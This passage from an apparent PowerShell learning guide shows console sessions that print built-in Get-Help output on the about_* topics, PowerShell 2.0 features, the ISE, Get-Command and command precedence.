C:\\Users\\Windows-32>\n```\n\n- Use Get-Help ```about_``` to retrieve help about ```powershell.exe```.\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help about*\n\nName Category Synopsis\n---- -------- --------\nabout_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows\nabout_Arithmetic_Operators HelpFile Describes the operators that perform arithmetic in Windows PowerShell.\nabout_arrays HelpFile Describes a compact data structure for storing data elements.\nabout_Assignment_Operators HelpFile Describes how to use operators to assign values to variables.\nabout_Automatic_Variables HelpFile Describes variables that store state information for Windows PowerShell.\nabout_Break HelpFile Describes a statement you can use to immediately exit Foreach, For, While,\nabout_command_precedence HelpFile Describes how Windows PowerShell determines which command to run.\nabout_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help.\nabout_Comment_Based_Help HelpFile Describes how to write comment-based Help topics for functions and scripts.\nabout_CommonParameters HelpFile Describes the parameters that can be used with any cmdlet.\nabout_Comparison_Operators HelpFile Describes the operators that compare values in Windows PowerShell.\nabout_Continue HelpFile Describes how the Continue statement immediately returns the program flow\nabout_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell\nabout_data_sections HelpFile Explains Data sections, which isolate text strings and other read-only\nabout_debuggers HelpFile Describes the Windows PowerShell debugger.\nabout_do HelpFile Runs a statement list one or more times, subject to a While or Until\nabout_environment_variables HelpFile Describes how to access Windows environment variables in Windows\nabout_escape_characters HelpFile Introduces the escape character in Windows PowerShell and explains\nabout_eventlogs HelpFile Windows PowerShell creates a Windows event log that is\nabout_execution_policies HelpFile Describes the Windows PowerShell execution policies and explains\nabout_For HelpFile Describes a language command you can use to run statements based on a\nabout_Foreach HelpFile Describes a language command you can use to traverse all the items in a\nabout_format.ps1xml HelpFile The Format.ps1xml files in Windows PowerShell define the default display\nabout_functions HelpFile Describes how to create and use functions in Windows PowerShell.\nabout_functions_advanced HelpFile Introduces advanced functions that act similar to cmdlets.\nabout_functions_advanced_methods HelpFile Describes how functions that specify the CmdletBinding attribute can use\nabout_functions_advanced_param... HelpFile Explains how to add static and dynamic parameters to functions that declare\nabout_functions_cmdletbindinga... HelpFile Describes an attribute that declares a function that acts similar to a\nabout_hash_tables HelpFile Describes how to create, use, and sort hash tables in Windows PowerShell.\nabout_History HelpFile Describes how to retrieve and run commands in the command history.\nabout_If HelpFile Describes a language command you can use to run statement lists based\nabout_jobs HelpFile Provides information about how Windows PowerShell background jobs run a\nabout_job_details HelpFile Provides details about background jobs on local and remote computers.\nabout_join HelpFile Describes how the join operator (-join) combines multiple strings into a\nabout_Language_Keywords HelpFile Describes the keywords in the Windows PowerShell scripting language.\nabout_Line_Editing HelpFile Describes how to edit commands at the Windows PowerShell command prompt.\nabout_locations HelpFile Describes how to access items from the working location in Windows\nabout_logical_operators HelpFile Describes the operators that connect statements in Windows PowerShell.\nabout_methods HelpFile Describes how to use methods to perform actions on objects in Windows\nabout_modules HelpFile Explains how to install, import, and use Windows PowerShell modules.\nabout_objects HelpFile Provides essential information about objects in Windows PowerShell.\nabout_operators HelpFile Describes the operators that are supported by Windows PowerShell.\nabout_parameters HelpFile Describes how to work with cmdlet parameters in Windows PowerShell.\nabout_Parsing HelpFile Describes how Windows PowerShell parses commands.\nabout_Path_Syntax HelpFile Describes the full and relative path name formats in Windows PowerShell.\nabout_pipelines HelpFile Combining commands into pipelines in the Windows PowerShell\nabout_preference_variables HelpFile Variables that customize the behavior of Windows PowerShell\nabout_profiles HelpFile Describes how to create and use a Windows PowerShell profile.\nabout_prompts HelpFile Describes the Prompt function and demonstrates how to create a custom\nabout_properties HelpFile Describes how to use object properties in Windows PowerShell.\nabout_providers HelpFile Describes how Windows PowerShell providers provide access to data and\nabout_pssessions HelpFile Describes Windows PowerShell sessions (PSSessions) and explains how to\nabout_pssession_details HelpFile Provides detailed information about Windows PowerShell sessions and the\nabout_PSSnapins HelpFile Describes Windows PowerShell snap-ins and shows how to use and manage them.\nabout_Quoting_Rules HelpFile Describes rules for using single and double quotation marks\nabout_Redirection HelpFile Describes how to redirect output from Windows PowerShell to text files.\nabout_Ref HelpFile Describes how to create and use a reference variable type.\nabout_regular_expressions HelpFile Describes regular expressions in Windows PowerShell.\nabout_remote HelpFile Describes how to run remote commands in Windows PowerShell.\nabout_remote_FAQ HelpFile Contains questions and answers about running remote commands\nabout_remote_jobs HelpFile Describes how to run background jobs on remote computers.\nabout_remote_output HelpFile Describes how to interpret and format the output of remote commands.\nabout_remote_requirements HelpFile Describes the system requirements and configuration requirements for\nabout_remote_troubleshooting HelpFile Describes how to troubleshoot remote operations in Windows PowerShell.\nabout_requires HelpFile Prevents a script from running by requiring the specified snap-ins and\nabout_Reserved_Words HelpFile Lists the reserved words that cannot be used as identifiers because they\nabout_Return HelpFile Exits the current scope, which can be a function, script, or script block.\nabout_scopes HelpFile Explains the concept of scope in Windows PowerShell and shows how to set\nabout_scripts HelpFile Describes how to write and run scripts in Windows PowerShell.\nabout_script_blocks HelpFile Defines what a script block is and explains how to use script blocks in\nabout_script_internationalization HelpFile Describes the script internationalization features of Windows PowerShell...\nabout_Session_Configurations HelpFile Describes session configurations, which determine the users who can\nabout_Signing HelpFile Explains to how sign scripts so that they comply with the Windows\nabout_Special_Characters HelpFile Describes the special characters that you can use to control how\nabout_split HelpFile Explains how to use the split operator to split one or more strings into\nabout_Switch HelpFile Explains how to use a switch to handle multiple If statements.\nabout_Throw HelpFile Describes the Throw keyword, which generates a terminating error.\nabout_transactions HelpFile Describes how to manage transacted operations in Windows PowerShell.\nabout_trap HelpFile Describes a keyword that handles a terminating error.\nabout_try_catch_finally HelpFile Describes how to use the Try, Catch, and Finally blocks to handle\nabout_types.ps1xml HelpFile Explains how the Types.ps1xml files let you extend the Microsoft .NET\nabout_type_operators HelpFile Describes the operators that work with Microsoft .NET Framework types.\nabout_Variables HelpFile Describes how variables store values that can be used in Windows\nabout_While HelpFile Describes a language statement that you can use to run a command block\nabout_wildcards HelpFile Describes how to use wildcard characters in Windows PowerShell.\nabout_Windows_PowerShell_2.0 HelpFile Describes the new features that are included in Windows PowerShell 2.0.\nabout_Windows_PowerShell_ISE HelpFile Describes the features and system requirements of Windows PowerShell\nabout_WMI_Cmdlets HelpFile Provides background information about Windows Management Instrumentation\nabout_WS-Management_Cmdlets HelpFile Provides an overview of Web Services for Management (WS-Management) as\n\n\nPS C:\\Users\\Windows-32>\n```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help about_Windows_PowerShell_2.0\nTOPIC\n about_Windows_PowerShell_2.0\n\nSHORT DESCRIPTION\n Describes the new features that are included in Windows PowerShell 2.0.\n\n\nLONG DESCRIPTION\n Windows PowerShell 2.0 includes several significant features that\n extend its use, improve its usability, and allow you to control and\n manage Windows-based environments more easily and comprehensively.\n\n\n Windows PowerShell 2.0 is backward compatible. Cmdlets, providers,\n snap-ins, scripts, functions, and profiles that were designed for Windows\n PowerShell 1.0 work in Windows PowerShell 2.0 without changes.\n\n\nNEW FEATURES\n Windows PowerShell 2.0 includes the following new features.\n\n\n Remoting\n\n Windows PowerShell 2.0 lets you run commands on one or many remote\n computers with a single Windows PowerShell command. You can run\n individual commands, or you can create a persistent connection\n (a session) to run a series of related commands. You can also start a\n session with a remote computer so that the commands you type run\n directly on the remote computer.\n\n\n The remoting features of Windows PowerShell are built on Windows\n Remote Management (WinRM). WinRM is the Microsoft implementation of\n the WS-Management protocol, a standard SOAP-based, firewall-compatible\n communications protocol.\n\n\n The remote computers must have Windows PowerShell 2.0, the Microsoft .NET\n Framework 2.0, and the WinRM service. Remote commands are supported\n on all operating systems that can run Windows PowerShell. The\n current user must have permission to run commands on the remote\n computers. For more information, see about_Remote_Requirements.\n\n\n To support remoting, the Invoke-Command, Enter-PSSession, and\n Exit-PSSession cmdlets have been added, along with other cmdlets\n that contain the PSSession noun. These cmdlets let you create and manage\n persistent connections.\n\n\n The ComputerName parameter has also been added to several cmdlets,\n including the Get-Process, Get-Service, and Get-Eventlog cmdlets. This\n parameter allows you to get information about remote computers.\n These cmdlets use .NET Framework methods to get their data,\n so they do not rely on Windows PowerShell remoting. They do not require\n any new programs or configuration. For more information, see the Help for\n each cmdlet.\n\n\n For more information about remote commands, see about_Remote and\n about_Remote_FAQ. For more information about sessions, see\n about_PSSessions.\n\n\n Windows PowerShell ISE\n\n Windows PowerShell 2.0 includes Windows PowerShell Integrated\n Scripting Environment (ISE), a host application that lets you run\n commands, and design, write, test, and debug scripts in a graphical,\n color-coded, Unicode-based environment.\n\n\n Windows PowerShell ISE requires the Microsoft .NET Framework 3.0 or\n later.\n\n\n Windows PowerShell ISE includes:\n\n - A Command pane that lets you run interactive commands just as you\n would in the Windows PowerShell console. Just type a command, and then\n press ENTER. The output appears in the Output pane.\n\n - A Script pane that lets you compose, edit, debug, and run functions\n and scripts.\n\n - Multiple tabs, each with its own Command and Script pane, that let you\n work on one or several tasks independently.\n\n\n Windows PowerShell ISE is designed for both novice and advanced users.\n\n\n Background Jobs\n\n Background jobs are commands that run asynchronously. When you run a\n background job, the command prompt returns immediately, even if the\n command is still running. You can use the background job feature to run a\n complex command in the background so that you can use your session for\n other work while the command runs.\n\n\n You can run a background job on a local or remote computer and then save\n the results on the local or remote computer. To run a job remotely, use\n the Invoke-Command cmdlet.\n\n\n Windows PowerShell includes a set of cmdlets that contain the Job noun\n (the Job cmdlets). Use these cmdlets for creating, starting, managing,\n and deleting background jobs and for getting the results of a background\n job. To get a list of the job cmdlets, type the following command:\n\n get-command *-job\n\n\n For more information about background jobs, see about_Jobs.\n\n\n Script Debugger\n\n Windows PowerShell 2.0 includes a cmdlet-based debugger for scripts and\n functions. The debugger is supported by a fully documented public API\n that you can use to build your own debugger or to customize or extend\n the debugger.\n\n\n The debugger cmdlets let you set breakpoints on lines, columns,\n variables, and commands. These cmdlets let you manage the breakpoints\n and display the call stack. You can create conditional breakpoints and\n specify custom actions at a breakpoint, such as running diagnostic and\n logging scripts.\n\n\n When you reach a breakpoint, Windows PowerShell suspends execution\n and starts the debugger. The debugger includes a set of custom commands\n that let you step through the code. You can also run standard Windows\n PowerShell commands to display the values of variables, and you can use\n cmdlets to investigate the results.\n\n\n For more information about debugging, see about_Debuggers.\n\n\n Data Section\n\n Scripts designed for Windows PowerShell 2.0 can have one or more\n DATA sections that isolate the data from the script logic. The data in\n the new DATA section is restricted to a specified subset of the Windows\n PowerShell scripting language.\n\n\n In Windows PowerShell 2.0, the DATA section is used to support\n script internationalization. You can use the DATA section to isolate\n and identify user message strings that will be translated into\n multiple user interface languages.\n\n\n For more information, see about_Data_Sections.\n\n\n Script Internationalization\n\n Windows PowerShell 2.0 script internationalization features allow you\n to better serve users throughout the world. Script internationalization\n enables scripts and functions to display messages and Help text to users\n in multiple languages.\n\n\n The script internationalization features query the operating system user\n interface culture ($PsUICulture) during execution and then import the\n appropriate translated text strings so you can display them to the user.\n The Data section lets you store text strings separate from code so that\n they are easily identified. A new cmdlet, ConvertFrom-StringData,\n converts text strings into dictionary-like hash tables to facilitate\n translation.\n\n\n For more information, see about_Script_Internationalization.\n\n\n\n WMI Cmdlets\n\n The Windows Management Instrumentation (WMI) functionality of\n Windows PowerShell 2.0 is improved with the addition of the following\n cmdlets:\n\n - Remove-WmiObject\n - Set-WmiInstance\n - Invoke-WmiMethod\n\n\n New parameters have been added to the Get-WmiObject cmdlet. All the WMI\n cmdlets now support the following parameters:\n\n - EnableAllPrivileges\n - Impersonation\n - Authentication\n - Authority\n\n\n These new parameters give you more refined control over the security\n configuration of your WMI operations without requiring you to work\n directly with the types in the .NET Framework Class Library.\n\n\n For a list of WMI cmdlets, type the following command:\n\n get-help *wmi*\n\n To get help for each cmdlet, type get-help followed by the cmdlet name.\n\n\n The Get-WinEvent Cmdlet\n\n The Get-WinEvent cmdlet gets events from Event Viewer logs and from\n Event Tracing for Windows (ETW) event log files on local and remote\n computers. It can get events from classic event logs and from the\n Windows Event Logs that were introduced in Windows Vista.\n\n\n You can use Get-WinEvent to get the objects that represent event logs, event\n log providers, and the events in the logs. Get-WinEvent lets you combine\n events from different sources in a single command. It supports\n advanced queries in XML Path Language (XPath), XML, and hash table\n format.\n\n\n Get-WinEvent requires Windows Vista or Windows Server 2008 and the\n Microsoft .NET Framework 3.5.\n\n\n The Out-Gridview Cmdlet\n\n The Out-GridView cmdlet displays the results of other commands in an\n interactive table in which you can search, sort, group, and filter the\n results. For example, you can send the results of a Get-Process,\n Get-WmiObject, Get-WinEvent, or Get-Eventlog command to Out-GridView and\n then use the table features to examine the data.\n\n help out-gridview -full\n\n\n The Add-Type Cmdlet\n\n The Add-Type cmdlet lets you add .NET Framework types to\n Windows PowerShell from the source code of another .NET Framework\n language.\n\n\n Add-Type compiles the source code that creates the types and generates\n assemblies that contain the new .NET Framework types. Then, you can use\n the .NET Framework types in Windows PowerShell commands along with the\n standard object types provided by the .NET Framework.\n\n\n You can also use Add-Type to load assemblies into your session so that\n you can use the types in the assemblies in Windows PowerShell.\n\n\n Add-Type allows you develop new .NET Framework types, to\n use .NET Framework types in C# libraries, and to access Win32 APIs.\n\n\n For more information, see Add-Type.\n\n\n Event Notification\n\n Windows PowerShell 2.0 introduces event notification. Users can register\n and subscribe to events, such as Windows PowerShell events, WMI events,\n or .NET Framework events. And, users can listen, forward, and act on\n management and system events both synchronously and asynchronously.\n\n\n Developers can write applications that use the event architecture\n to receive notification about state changes. Users can write\n scripts that subscribe to various events and that react to the content.\n\n\n Windows PowerShell provides cmdlets that create new events, get\n events and event subscriptions, register and unregister events,\n wait for events, and delete events. For more information about these\n cmdlets, type the following command:\n\n get-command *-event\n\n\n Modules\n\n Windows PowerShell modules let you divide and organize your\n Windows PowerShell scripts into independent, self-contained,\n reusable units. Code from a module executes in its own context,\n so it does not add to, conflict with, or overwrite the variables,\n functions, aliases, and other resources in the session.\n\n\n You can write, distribute, combine, share, and reuse modules to build\n simple scripts and complex applications.\n\n\n Windows PowerShell 2.0 includes cmdlets to add, get, and remove modules\n and to export module members. For more information about the cmdlets\n that are related to modules, type the following command:\n\n get-command *-module*\n\n\n Transactions\n\n Windows PowerShell 2.0 includes support for transactions. Transactions\n let you undo an entire series of operations. Transactions are available\n only for operations that support transactions. They are designed for\n applications that require atomicity, consistency, isolation, and\n recoverability, like databases and message queuing.\n\n\n Cmdlets and providers that support transactions have a new\n UseTransaction parameter. To start an operation within a transaction,\n use the Start-Transaction cmdlet. Then, when you use the cmdlets that\n perform the operation, use the UseTransaction parameter of each cmdlet\n when you want the command to be part of a transaction.\n\n\n If any command in the transaction fails at any point, use the\n Rollback-Transaction cmdlet to undo all the commands in the transaction.\n If all the commands succeed, use the Commit-Transaction cmdlet to make\n the command actions permanent.\n\n\n Windows PowerShell 2.0 includes cmdlets to start, use, commit, and roll\n back transactions. For information about these cmdlets, type the\n following command:\n\n get-command *transaction*\n\n\n\n Breaking Changes to Windows PowerShell 1.0\n\n -- The value of the PowerShellVersion registry entry in\n HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine\n is changed to 2.0.\n\n -- New cmdlets and variables have been added. These additions might\n conflict with variables and functions in profiles and scripts.\n\n -- The -IEQ operator performs a case insensitive comparison on characters.\n\n -- The Get-Command cmdlet gets functions by default, in addition to\n cmdlets.\n\n -- Native commands that generate a user interface cannot be piped to the\n Out-Host cmdlet.\n\n -- The new Begin, Process, End, and Dynamic Param language keywords might\n conflict with similar words used in scripts and functions. Interpreting\n these words as language keywords might result in parsing errors.\n\n -- Cmdlet name resolution has changed. In Windows PowerShell 1.0, a\n runtime error was generated when two Windows PowerShell snap-ins\n exported cmdlets with the same name. In Windows PowerShell 2.0, the\n last cmdlet that is added to the session runs when you type the command\n name. To run a command that does not run by default, qualify the cmdlet\n name with the name of the snap-in or module in which it originated.\n\n -- A function name followed by '-?' gets the help topic for the function,\n if one is included in the function.\n\n -- Parameter resolution for Microsoft .Net Frameword methods have changed.\n In Windows PowerShell 1.0, if you called an overloaded .NET method\n that has more than one best fit syntax, no error was reported. In\n Windows PowerShell 2.0, an ambiguity error is reported.\n\n In addition, in Windows PowerShell 2.0, the algorithm for choosing the\n best fit method has been revised significantly to minimize the number\n of ambiguities.\n\n -- If you are enumerating a collection in the pipeline and you try to\n modify the collection in the pipeline, Windows PowerShell throws an\n exception.\n\n For example, the following commands would work in Windows\n PowerShell 1.0, but would fail after first pipeline iteration in\n Windows PowerShel 2.0.\n\n $h = @{Name=\"Hello\"; Value=\"Test\"}\n $h.keys | foreach-object {$h.remove($_)}\n\n To avoid this error, create a sub-expression for the enumerator\n by using the $() characters. For example:\n\n $($h.keys) | foreach-object {$h.remove($_)}\n\n\n\n For more information about Windows PowerShell 2.0, visit the following Web\n sites:\n\n -- Windows PowerShell Web Site\n http://go.microsoft.com/fwlink/?LinkID=106031\n\n -- Windows PowerShell Team Blog:\n http://go.microsoft.com/fwlink/?LinkId=143696\n\n\nSEE ALSO\n about_Data_Sections\n about_Debuggers\n about_Functions_Advanced\n about_Jobs\n about_Join\n about_PSSessions\n about_Remote\n about_Script_Internationalization\n about_Split\nPS C:\\Users\\Windows-32>\n```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help about_Windows_PowerShell_ISE\nTOPIC\n about_Windows_PowerShell_ISE\n\nSHORT DESCRIPTION\n Describes the features and system requirements of Windows PowerShell\n Integrated Scripting Environment (ISE).\n\n\nLONG DESCRIPTION\n Windows PowerShell ISE is a host application for Windows PowerShell.\n In Windows PowerShell ISE, you can run commands and write, test, and debug\n scripts in a single Windows-based graphical user interface. Its features\n include multiline editing, tab completion, syntax coloring, selective\n execution, context-sensitive Help, and support for right-to-left languages.\n\n Notes: Because this feature requires a user interface, it does not work on\n Server Core installations of Windows Server.\n\n Window PowerShell ISE is built on the Windows Presentation\n Foundation (WPF). If the graphical elements of Windows PowerShell\n ISE do not render correctly on your system, you might resolve the\n problem by adding or adjusting the graphics rendering settings on\n your system. This might be required if the computer has an older\n video driver or you are using virtualization software. For more\n information, see \"Graphics Rendering Registry Settings\" in the MSDN\n library at http://go.microsoft.com/fwlink/?LinkId=144711.\n\n Running Interactive Commands\n\n You can run any Windows PowerShell expression or command in Windows\n PowerShell ISE. You can use cmdlets, providers, snap-ins, and modules as\n you would use them in the Windows PowerShell console.\n\n\n You can type or paste interactive commands in the Command pane. To run the\n commands, you can use buttons, menu items, and keyboard shortcuts.\n\n\n You can use the multiline editing feature to type or paste several lines\n of code into the Command pane at once. When you press the UP ARROW key to\n recall the previous command, all the lines in the command are recalled.\n When you type commands, press SHIFT+ENTER to make a new blank line appear\n under the current line.\n\n\n Viewing Output\n\n The results of commands and scripts are displayed in the Output pane. You\n can move or copy the results from the Output pane by using keyboard\n shortcuts or the Output toolbar, and you can paste the results in other\n programs. You can also clear the Output pane by clicking the Clear Output\n button or by typing one of the following commands:\n\n clear-host\n\n cls\n\n\n Writing Scripts and Functions\n\n In the Script pane, you can open, compose, edit, and run scripts. The\n Script pane lets you edit scripts by using buttons and keyboard shortcuts.\n You can also copy, cut, and paste text between the Script pane and the\n Command pane.\n\n\n You can use the selective run feature to run all or part of a script. To\n run part of a script, select the text you want to run, and then click the\n Run Script button. Or, press F5.\n\n\n Debugging Scripts\n\n You can use the Windows PowerShell ISE debugger to debug a Windows\n PowerShell script or function. When you debug a script, you can use menu\n items and shortcut keys to perform many of the same tasks that you would\n perform in the Windows PowerShell console. For example, to set a line\n breakpoint in a script, right-click the line of code, and then click\n Toggle Breakpoint.\n\n\n You can also use the Windows PowerShell debugger cmdlets in the Command\n pane just as you would use them in the console.\n\n\n Tab Completion\n\n Windows PowerShell ISE has tab completion for cmdlet names, parameter\n names, and Microsoft .NET Framework static types. To use tab completion,\n type the beginning of the name, and then press the TAB key.\n\n\n Getting Help\n\n Windows PowerShell ISE includes a searchable compiled Help file that\n describes Windows PowerShell ISE and Windows PowerShell. This Help file\n includes all the Help that is available from the Get-Help cmdlet. To view\n the Help file in Windows PowerShell ISE, use the Help menu. Or, press F1.\n\n\n The Help is context sensitive. For example, if you type Invoke-Item and\n then press F1, the Help file opens to the Help topic for the Invoke-Item\n cmdlet.\n\n\n And, you can use the Get-Help cmdlet in Windows PowerShell as you would in\n the Windows PowerShell console.\n\n\n Customizing the View\n\n You can use Windows PowerShell ISE features to move and to resize the\n Command pane, the Output pane, and the Script pane. You can show and hide\n the Script pane, and you can change the text size in all the panes.\n\n\n You can also use the $Host variable to change some aspects of the\n appearance of Windows PowerShell ISE, including the window title and the\n foreground and background colors in the Output pane. In addition, Windows\n PowerShell ISE has its own custom host variable, $psgHost. You can use\n this variable to customize Windows PowerShell ISE, including adding menus\n and menu items.\n\n\n Windows PowerShell ISE Profile\n\n Windows PowerShell ISE has its own Windows PowerShell profile,\n Microsoft.PowerShellISE_profile.ps1. In this profile, you can store\n functions, aliases, variables, and commands that you use in Windows\n PowerShell ISE.\n\n\n Items in the Windows PowerShell AllHosts profiles (CurrentUser\\AllHosts\n and AllUsers\\AllHosts) are also available in Windows PowerShell ISE, just\n as they are in any Windows PowerShell host program. However, the items\n in your Windows PowerShell console profiles are not available in Windows\n PowerShell ISE.\n\n\n Instructions for moving and reconfiguring your profiles are available in\n Windows PowerShell ISE Help and in about_Profiles.\n\n\n System Requirements\n\n -Operating Systems:\n - Windows 7\n - Windows Server 2008\n - Windows Server 2003 with Service Pack 2\n - Windows Vista with Service Pack 1\n - Windows XP with Service Pack 2\n\n - Microsoft .NET Framework 3.0\n\n - Windows PowerShell remoting requires Windows Remote Management 2.0.\n\n\n Notes\n\n - The Get-WinEvent cmdlet requires Windows Vista and later versions of\n Windows and the Microsoft .NET Framework 3.5.\n\n - The Export-Counter cmdlet runs only in Windows 7.\n\n\n Starting Windows PowerShell ISE\n\n - To start Windows PowerShell ISE, click Start, point to All Programs,\n point to Windows PowerShell, and then click Windows PowerShell ISE.\n\n - In the Windows PowerShell console, Cmd.exe, or in the Run box,\n type \"powershell_ise.exe\".\n\n\nSEE ALSO\n about_Profiles\n Get-Help\n\nPS C:\\Users\\Windows-32>\n```\n\n- Use ```Get-Help``` with ```wildcards``` to list help about ```“command”```.\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help *command*\n\nName Category Synopsis\n---- -------- --------\nGet-Command Cmdlet Gets basic information about cmdlets and other elements of Windows Power...\nInvoke-Command Cmdlet Runs commands on local and remote computers.\nMeasure-Command Cmdlet Measures the time it takes to run script blocks and cmdlets.\nTrace-Command Cmdlet Configures and starts a trace of the specified expression or command.\nabout_command_precedence HelpFile Describes how Windows PowerShell determines which command to run.\nabout_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help.\nabout_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell\n\n\nPS C:\\Users\\Windows-32>\n```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help Get-Command\n\nNAME\n Get-Command\n\nSYNOPSIS\n Gets basic information about cmdlets and other elements of Windows PowerShell commands.\n\n\nSYNTAX\n Get-Command [[-Name] ] [-CommandType {Alias | Function | Filter | Cmdlet | ExternalScript | Application |\n Script | All}] [[-ArgumentList] ] [-Module ] [-Syntax] [-TotalCount ] [\n ]\n\n Get-Command [-Noun ] [-Verb ] [[-ArgumentList] ] [-Module ] [-Syntax] [-Tot\n alCount ] []\n\n\nDESCRIPTION\n The Get-Command cmdlet gets basic information about cmdlets and other elements of Windows PowerShell commands in th\n e session, such as aliases, functions, filters, scripts, and applications.\n\n Get-Command gets its data directly from the code of a cmdlet, function, script, or alias, unlike Get-Help, which ge\n ts its information from help topic files.\n\n Without parameters, \"Get-Command\" gets all of the cmdlets and functions in the current session. \"Get-Command *\" get\n s all Windows PowerShell elements and all of the non-Windows-PowerShell files in the Path environment variable ($en\n v:path). It groups the files in the \"Application\" command type.\n\n You can use the Module parameter of Get-Command to find the commands that were added to the session by adding a Win\n dows PowerShell snap-in or importing a module.\n\n\nRELATED LINKS\n Online version: http://go.microsoft.com/fwlink/?LinkID=113309\n about_Command_Precedence\n Get-Help\n Get-PSDrive\n Get-Member\n Import-PSSession\n Export-PSSession\n\nREMARKS\n To see the examples, type: \"get-help Get-Command -examples\".\n For more information, type: \"get-help Get-Command -detailed\".\n For technical information, type: \"get-help Get-Command -full\".\n\n\n\nPS C:\\Users\\Windows-32>\n```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help about_command_precedence\nTOPIC\n about_Command_Precedence\n\nSHORT DESCRIPTION\n Describes how Windows PowerShell determines which command to run.\n\nLONG DESCRIPTION\n This topic explains how Windows PowerShell determines which command to\n run, especially when a session contains more than one command with the\n same name. It also explains how to run commands that do not run by\n default, and it explains how to avoid command-name conflicts in your\n session.\n\n\n COMMAND PRECEDENCE\n When a session includes commands that have the same name, Windows\n PowerShell uses the following rules to decide which command to run.\n\n These rules become very important when you add commands to your session\n from modules, snap-ins, and other sessions.\n\n\n -- If you specify the path to a command, Windows PowerShell runs the\n command at the location specified by the path.\n\n For example, the following command runs the FindDocs.ps1\n script in the C:\\TechDocs directory:\n\n C:\\TechDocs\\FindDocs.ps1\n\n As a security feature, Windows PowerShell does not run executable\n (native) commands, including Windows PowerShell scripts, unless the\n command is located in a path that is listed in the Path environment\n variable ($env:path) or unless you specify the path to the script\n file.\n\n To run a script that is in the current directory, specify the full\n path, or type a dot (.) to represent the current directory.\n\n For example, to run the FindDocs.ps1 file in the current directory,\n type:\n\n .\\FindDocs.ps1\n\n\n -- If you do not specify a path, Windows PowerShell uses the following\n precedence order when it runs commands:\n\n 1. Alias\n 2. Function\n 3. Cmdlet\n 4. Native Windows commands\n\n Therefore, if you type \"help\", Windows PowerShell first looks for an\n alias named \"help\", then a function named \"Help\", and finally a\n cmdlet named \"Help\". It runs the first \"help\" item that it finds.\n\n For example, assume you have a function named Get-Map. Then, you add\n or import a cmdlet named Get-Map. By default, Windows PowerShell\n runs the function when you type \"Get-Map\".\n\n\n -- When the session contains items of the same type that have the same\n name, such as two cmdlets with the same name, Windows PowerShell\n runs the item that was added to the session most recently.\n\n For example, assume you have a cmdlet named Get-Date. Then, you import\n another cmdlet named Get-Date. By default, Windows PowerShell runs\n the most-recently imported cmdlet when you type \"Get-Date\".\n\n\n HIDDEN and REPLACED ITEMS\n As a result of these rules, items can be replaced or hidden by items with\n the same name.\n\n -- Items are \"hidden\" or \"shadowed\" if you can still access the original\n item, such as by qualifying the item name with a module or snap-in\n name.\n\n For example, if you import a function that has the same name as a\n cmdlet in the session, the cmdlet is hidden (but not replaced)\n because it was imported from a snap-in or module.\n\n\n -- Items are \"replaced\" or \"overwritten\" if you can no longer access\n the original item.\n\n For example, if you import a variable that has the same name as a\n a variable in the session, the original variable is replaced and is\n no longer accessible. You cannot qualify a variable with a module\n name.\n\n Also, if you type a function at the command line and then import\n a function with the same name, the original function is replaced and\n is no longer accessible.\n\n\n RUNNING HIDDEN COMMANDS\n You can run particular commands by specifying item properties that\n distinguish the command from other commands that might have the same\n name.\n\n You can use this method to run any command, but it is especially useful\n for running hidden commands.\n\n Use this method as a best practice when writing scripts that you intend\n to distribute because you cannot predict which commands might be present\n in the session in which the script runs.\n\n\n QUALIFIED NAMES\n You can run commands that have been imported from a Windows PowerShell\n snap-in or module or from another session by qualifying the command\n name with the name of the module or snap-in in which it originated.\n\n You can qualify commands, but you cannot qualify variables or aliases.\n\n For example, if the Get-Date cmdlet from the Microsoft.PowerShell.Utility\n snap-in is hidden by an alias, function, or cmdlet with the same name, you\n can run it by using the snap-in-qualified name of the cmdlet:\n\n Microsoft.PowerShell.Utility\\Get-Date\n\n\n To run a New-Map command that was added by the MapFunctions module, use\n its module-qualified name:\n\n MapFunctions\\New-Map\n\n\n To find the snap-in or module from which a command was imported, use the\n following Get-Command command format:\n\n get-command | format-list -property Name, PSSnapin, Module\n\n\n For example, to find the source of the Get-Date cmdlet, type:\n\n\n get-command get-date | format-list -property Name, PSSnapin, Module\n\n Name : Get-Date\n PSSnapIn : Microsoft.PowerShell.Utility\n Module :\n\n\n CALL OPERATOR\n You can also use the Call operator (&) to run any command that you\n can get by using a Get-ChildItem (the alias is \"dir\"), Get-Command, or\n Get-Module command.\n\n To run a command, enclose the Get-Command command in parentheses,\n and use the Call operator (&) to run the command.\n\n &(get-command ...)\n\n - or -\n\n &(dir ... )\n\n\n For example, if you have a function named Map that is hidden by an\n alias named Map, use the following command to run the function.\n\n &(get-command -name map -type function)\n\n - or -\n\n &(dir function:\\map)\n\n\n You can also save your hidden command in a variable to make it\n easier to run.\n\n For example, the following command saves the Map function in the\n $myMap variable and then uses the Call operator to run it.\n\n $myMap = (get-command -name map -type function)\n\n &($myMap)\n\n\n If a command originated in a module, you can use the following\n format to run it.\n\n & \n\n For example, to run the Add-File cmdlet in the FileCommands\n module, use the following command sequence.\n\n $FileCommands = get-module -name FileCommands\n\n & $FileCommands Add-File\n\n\n\n REPLACED ITEMS\n Items that have not been imported from a module or snap-in, such as\n functions, variables, and aliases that you create in your session or\n that you add by using a profile can be replaced by commands that have\n the same name. If they are replaced, you cannot access them.\n\n Variables and aliases are always replaced even if they have been\n imported from a module or snap-in because you cannot use a call operator\n or a qualified name to run them.\n\n For example, if you type a Get-Map function in your session, and you\n import a function called Get-Map, the original function is replaced.\n You cannot retrieve it in the current session.\n\n\n AVOIDING NAME CONFLICTS\n The best way to manage command name conflicts is to prevent them. When\n you name your commands, use a name that is very specific or is likely to\n be unique. For example, add your initials or company name acronym to the\n nouns in your commands.\n\n Also, when you import commands into your session from a Windows PowerShell\n module or from another session, use the Prefix parameter of the\n Import-Module or Import-PSSession cmdlet to add a prefix to the nouns\n in the names of commands.\n\n For example, the following command avoids any conflict with the Get-Date\n and Set-Date cmdlets that come with Windows PowerShell when you import\n the 